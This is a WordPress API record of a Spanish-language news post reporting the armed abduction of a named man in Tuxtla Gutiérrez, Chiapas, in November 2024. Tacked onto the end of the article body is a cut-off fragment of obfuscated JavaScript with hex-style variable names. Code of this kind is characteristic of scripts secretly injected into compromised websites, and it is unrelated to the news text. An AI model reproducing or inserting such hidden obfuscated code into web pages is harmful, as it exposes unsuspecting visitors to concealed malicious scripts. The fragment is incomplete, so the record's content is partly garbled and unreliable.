{"id":18794,"date":"2024-11-08T05:05:57","date_gmt":"2024-11-08T05:05:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18794"},"modified":"2024-11-08T05:05:58","modified_gmt":"2024-11-08T05:05:58","slug":"levantan-a-un-hombre-en-la-patria-nueva","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18794","title":{"rendered":"Levantan&#8221; a un hombre en la Patria Nueva"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731041604621-1024x576.jpg\" alt=\"\" class=\"wp-image-18795\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731041604621-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731041604621-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731041604621-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731041604621.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 7 de noviembre del 2024. &#8211; Este mi\u00e9rcoles por la noche un sujeto fue levantado por hombres fuertemente armados a la altura de la Calle Avellano Sur y Abedul de la Colonia Patria Nueva de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>En el lugar de los hechos se dio a conocer que, una camioneta negra lleg\u00f3 al lugar de la que bajaron y de manera violenta sometieron al sujeto identificado como Samuel Ordo\u00f1ez y lo obligaron a ingresar a la unidad y escaparon.<\/p>\n\n\n\n<p>La v\u00edctima vest\u00eda pantal\u00f3n de mezclilla azul, y se desconoce su paradero.<\/p>\n\n\n\n<p>Los plagiarios portaban ropa oscura y chalecos t\u00e1cticos y portaban armas de alto poder.<\/p>\n\n\n\n<p>Elementos de la polic\u00eda arribaron a tomar datos y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 7 de noviembre del 2024. &#8211; Este mi\u00e9rcoles por la noche un sujeto fue levantado por hombres fuertemente armados a la altura de la Calle Avellano Sur y Abedul de la Colonia Patria Nueva de Tuxtla Guti\u00e9rrez. En el lugar de los hechos se dio a conocer que, una camioneta negra &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18795,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-18794","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18794","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18794"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18794\/revisions"}],"predecessor-version":[{"id":18796,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18794\/revisions\/18796"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18795"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18794"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18794"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18794"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}